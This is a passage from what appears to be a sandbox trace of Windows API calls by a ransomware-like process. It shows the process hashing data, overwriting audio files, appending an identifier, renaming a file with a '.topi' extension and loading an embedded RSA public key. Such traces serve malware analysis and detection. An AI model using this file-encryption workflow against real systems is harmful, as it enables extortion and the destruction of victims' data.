phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.014] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.014] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.014] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.014] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.014] GetLastError () returned 0x0 [0099.014] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.014] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.014] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.014] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.015] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1e50) returned 0x99fc2d8 [0099.015] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbf98 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbfe0 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5198 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.015] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51e0 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e51c8 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0099.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.016] GetCurrentThreadId () returned 0x8c4 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99faf10 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.016] GetCurrentThreadId () returned 0x8c4 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0099.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e51f8 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51c8 | out: hHeap=0x680000) returned 1 [0099.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51e0 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51b0 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5198 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbfe0 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.020] WriteFile (in: hFile=0x6a8, lpBuffer=0x99fc2d8*, nNumberOfBytesToWrite=0x1e4a, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99fc2d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x1e4a, lpOverlapped=0x0) returned 1 [0099.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc2d8 | out: hHeap=0x680000) returned 1 [0099.020] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1e4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.020] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.020] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.020] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.020] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.020] CloseHandle (hObject=0x6a8) returned 1 [0099.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6298 [0099.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0099.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0099.021] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\9Pf0AZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\9pf0az.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\9Pf0AZ.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\9pf0az.mp3.topi")) returned 1 [0099.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.022] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.023] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212d60e0, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x2d9adfb0, ftLastAccessTime.dwHighDateTime=0x1d5be85, ftLastWriteTime.dwLowDateTime=0x2d9adfb0, ftLastWriteTime.dwHighDateTime=0x1d5be85, nFileSizeHigh=0x0, nFileSizeLow=0x137f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hjpdvd.m4a", cAlternateFileName="")) returned 1 [0099.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0099.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0099.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0099.023] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hjpdvd.m4a") returned=".m4a" [0099.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hjpdvd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\hjpdvd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.024] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=79865) returned 1 [0099.024] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.026] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x137d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.026] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.027] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.027] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x137f9, lpOverlapped=0x0) returned 1 [0099.028] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0099.028] lstrlenA (lpString="-----BEGIN PUBLIC 